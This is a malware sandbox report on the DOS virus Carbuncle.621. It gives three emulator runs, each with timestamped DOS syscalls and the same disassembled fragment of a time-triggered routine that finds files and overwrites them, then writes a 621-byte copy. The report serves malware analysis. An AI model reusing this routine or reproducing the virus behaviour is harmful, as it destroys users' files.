Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.621

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:53:55.923461423Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-17T21:53:55.926670879Z 60 PC: 12a96 | Create or truncate file
2018-12-17T21:53:55.947790682Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-17T21:53:55.95613328Z 62 PC: 12aa6 | Close file
2018-12-17T21:53:55.965953717Z 67 PC: 12ab1 | Get or set file attributes
2018-12-17T21:53:55.976277745Z 26 PC: 12ab8 | Set disk transfer address
2018-12-17T21:53:55.977661808Z 78 PC: 12abf | Find first file
2018-12-17T21:53:55.989230263Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":420,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:53.602908234Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-25T11:40:53.606327674Z 78 PC: 12a69 | Find first file
2018-12-25T11:40:53.612973637Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:40:53.804041216Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-25T11:40:53.824441381Z 62 PC: 12aa6 | Close file
2018-12-25T11:40:53.833975508Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:40:53.846558143Z 26 PC: 12ab8 | Set disk transfer address
2018-12-25T11:40:53.848270165Z 78 PC: 12abf | Find first file
2018-12-25T11:40:53.861558055Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":420,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:53.62369706Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25a], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25b
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25a]
0x12a85: je 0x12a50
2018-12-25T11:40:53.626125851Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:40:53.803899041Z 64 PC: 12aa2 | Write file or device (Write 621 bytes on handle 5)
2018-12-25T11:40:53.813367226Z 62 PC: 12aa6 | Close file
2018-12-25T11:40:53.823515204Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:40:53.835932557Z 26 PC: 12ab8 | Set disk transfer address
2018-12-25T11:40:53.837316001Z 78 PC: 12abf | Find first file
2018-12-25T11:40:53.847568847Z 76 PC: 12a54 | Terminate with return code (Return code = '18')